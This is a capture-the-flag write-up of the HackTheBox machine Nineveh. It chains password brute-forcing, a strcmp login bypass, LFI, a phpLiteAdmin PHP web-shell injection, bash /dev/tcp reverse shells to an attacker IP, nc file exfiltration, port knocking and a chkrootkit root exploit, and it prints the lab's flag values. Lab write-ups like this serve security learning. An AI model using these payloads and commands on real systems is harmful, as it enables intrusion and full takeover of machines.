Post

HackTheBox Nineveh

Writeup for HackTheBox Nineveh

Posted Updated
By Edwin Tok
8 min read
HackTheBox Nineveh

Machine Synopsis

Nineveh is not overly challenging, however several exploits must be chained to gain initial access. Several uncommon services are running on the machine, and some research is required to enumerate them. (Source)

Key exploitation techniques:

  • Web directory enumeration
  • PHP strcmp vulnerability (implied) for authentication bypass
  • Local File Inclusion (LFI) for arbitrary file read
  • phpLiteAdmin Remote PHP Code Injection for RCE
  • Steganography (Binwalk) for hidden file extraction
  • Port knocking for hidden SSH port discovery
  • SSH with private key for initial user access
  • chkrootkit cronjob exploitation for root shell

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

$ nmap -sC -sV -A -p- 10.10.10.43

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time

website_port_80

The scan identified Apache HTTPD on ports 80 and 443 (HTTPS). The HTTP site returned a default webpage, while the HTTPS site displayed a custom page.

website_port_443

gobuster was used for directory enumeration on both HTTP and HTTPS.

1
2
3
4
5
6
7
8
9
10

$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k
...
/department             (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
...

$ gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k
...
/db                     (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/secure_notes           (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]
...

The /department directory on HTTP and /db, /secure_notes on HTTPS were identified.

department_webpage

Browsing to http://10.10.10.43/department/ led to a login page. Testing the login with admin as the username returned “Invalid Password!”, while other usernames returned “Invalid username”, confirming admin as a valid user. hydra was used to brute-force the password for admin.

1
2
3
4

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -s 80 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password" -t 64
...
[80][http-post-form] host: 10.10.10.43   login: admin    password: 1q2w3e4r5t
...

Logged into their webpage and found a notes section.

department_notes

The notes showed that the credentials were actually hardcoded.

That probably meant that the backend was using the vulnerable php strcmp function. Technically speaking, we could have just used our browser to Edit and Resend function to send this parameter in the Request Body instead - username=admin&password[]=.

alternative_department_login

The password 1q2w3e4r5t was found for admin. Logging in revealed a notes section. The notes indicated credentials were hardcoded, hinting at a PHP strcmp vulnerability (where strcmp with an array as the second argument returns NULL, which evaluates to true in a boolean context). Submitting username=admin&password[]= in the request body would bypass authentication.

The URL http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt suggested an LFI vulnerability. Testing various paths confirmed LFI.

1
2
3
4
5
6
7
8

# Test with /etc/passwd
# Request: http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../etc/passwd
# Response content:
root:x:0:0:root:/root:/bin/bash
...
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin

The /db directory on HTTPS was identified as phpLiteAdmin. searchsploit was used to find vulnerabilities for phpLiteAdmin. No immediate public exploits for the exact version were found, but a general “Remote PHP Code Injection” (ExploitDB ID 24044) was noted.

https_db

hydra was used to brute-force the phpLiteAdmin login page.

1
2
3

$ hydra -l shiro -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -s 443 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64
...
[443][http-post-form] host: 10.10.10.43   login: shiro    password: password123

db_attempt_login

phpliteadmin_login

The password password123 was found for shiro.

Exploitation

phpLiteAdmin RCE (www-data)

Based on ExploitDB ID 24044, phpLiteAdmin is vulnerable to remote PHP code injection. The steps are:

  1. Create a new database (e.g., shiro.php).
  2. Create a new table in this database.
  3. Insert a text field with the default value: <?php echo system($_REQUEST ["cmd"]); ?>.
  4. Access shiro.php with a cmd parameter to execute code.

After creating the malicious database and table, the LFI vulnerability was used to execute the PHP code stored in the database.

upload_php_code

view_db

1

# Request: http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/shiro.php&cmd=whoami

execute_php_code

A netcat listener was set up, and a reverse shell payload was executed via the LFI.

1
2
3
4
5
6
7
8
9

# Request: http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/shiro.php&cmd=bash -c 'exec bash -i %26>/dev/tcp/10.10.14.29/1234 <%261'

# Netcat Listener
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.43] 57400
bash: cannot set terminal process group (1387): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nineveh:/var/www/html/department$

This granted a reverse shell as www-data.

Privilege Escalation

Method 1: Port Knocking & SSH Key Extraction (amrois)

Enumeration of the /var/www/ssl/secure_notes directory (accessible via HTTPS) revealed nineveh.png.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

www-data@nineveh:/var/www/html/department$ cd ../
www-data@nineveh:/var/www/html$ ls
department  index.html  info.php  ninevehdestruction.jpg

www-data@nineveh:/var/www/html$ cd ../
www-data@nineveh:/var/www$ ls
html  ssl

www-data@nineveh:/var/www$ cd ssl
www-data@nineveh:/var/www/ssl$ ls
db  index.html  ninevehForAll.png  secure_notes

www-data@nineveh:/var/www/ssl$ cd secure_notes
www-data@nineveh:/var/www/ssl/secure_notes$ ls
index.html  nineveh.png
www-data@nineveh:/var/www/ssl/secure_notes$ nc 10.10.14.29 9999 < nineveh.png # Exfiltrate image

binwalk was used to extract hidden data from nineveh.png.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

$ binwalk -e nineveh.png --run-as=root

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)

$ ls
nineveh.png  _nineveh.png.extracted
$ cd _nineveh.png.extracted
$ ls
2BF8D0.tar  54  54.zlib  secret
$ cd secret
$ ls
nineveh.priv  nineveh.pub

The extracted secret directory contained nineveh.priv (RSA private key) and nineveh.pub (RSA public key). The public key revealed the username amrois.

1
2

$ cat nineveh.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

The initial nmap scan did not show SSH (port 22) open. Inspection of /etc/knockd.conf on the target (via LFI or the www-data shell) revealed a port knocking sequence.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens160

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

The SSH port could be opened by sending TCP SYN packets to ports 571, 290, and 911 in sequence.

1
2
3
4
5
6
7
8
9
10

$ for i in 571 290 911; do nmap -Pn --max-retries 0 -p $i 10.10.10.43 && sleep 1; done
...
PORT    STATE    SERVICE
571/tcp filtered umeter
...
PORT    STATE    SERVICE
290/tcp filtered unknown
...
PORT    STATE    SERVICE
911/tcp filtered xact-backup

An nmap scan after port knocking confirmed port 22 was open.

1
2
3
4
5
6

$ nmap 10.10.10.43

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

SSH access was gained using amrois and the extracted private key nineveh.priv.

1
2

$ ssh -i nineveh.priv amrois@10.10.10.43
amrois@nineveh:~$

Method 2: chkrootkit Cronjob Exploitation (root)

linenum.sh was uploaded and executed to enumerate privilege escalation vectors.

1
2
3
4
5
6
7
8

# On attacker, serve linenum.sh
$ python3 -m http.server 80

# On target, download and execute linenum.sh
amrois@nineveh:/tmp$ wget http://10.10.14.29/LinEnum.sh
amrois@nineveh:/tmp$ chmod +x LinEnum.sh
amrois@nineveh:/tmp$ ./LinEnum.sh
...

pspy32s was uploaded and executed to monitor processes.

1
2
3
4
5
6
7
8
9
10

# On attacker, serve pspy32s
$ python3 -m http.server 80

# On target, download and execute pspy32s
amrois@nineveh:/tmp$ wget http://10.10.14.29/pspy32s
amrois@nineveh:/tmp$ chmod +x pspy32s
amrois@nineveh:/tmp$ ./pspy32s
...
2022/06/28 09:54:02 CMD: UID=0    PID=12775  | /bin/sh /usr/bin/chkrootkit
...

pspy32s revealed that /usr/bin/chkrootkit was executed by root periodically (likely via a cronjob). Researching chkrootkit vulnerabilities revealed “Chkrootkit 0.49 - Local Privilege Escalation” (ExploitDB ID 33899). This exploit allows arbitrary code execution by placing a malicious executable named update in /tmp/.

A malicious update script was created (#!/bin/bash\nbash -c 'exec bash -i &>/dev/tcp/10.10.14.29/9999 <&1') and hosted on the attacking machine.

1
2
3
4
5
6
7

# On attacker, create malicious update script
$ cat update
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/10.10.14.29/9999 <&1'

# On attacker, serve update script
$ python3 -m http.server 80

The malicious update script was downloaded to /tmp/ on the target and made executable.

1
2

amrois@nineveh:/tmp$ wget http://10.10.14.29/update
amrois@nineveh:/tmp$ chmod +x update

A netcat listener was set up. After waiting for chkrootkit to execute, the reverse shell connected as root.

1
2
3
4
5
6
7
8
9
10

# On attacker, set up Netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...

# Reverse shell received
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.43] 50164
bash: cannot set terminal process group (21122): Inappropriate ioctl for device
bash: no job control in this shell
root@nineveh:~# whoami
root

The user.txt and root.txt flags were retrieved.

1
2
3
4

root@nineveh:/home# cat /home/amrois/user.txt
5739ccb3a42b270d86e50c877513187c
root@nineveh:/home# cat /root/root.txt
be1e57843d1f3e03b88d890411bcd901
HackTheBox
windows
This post is licensed under CC BY 4.0 by the author.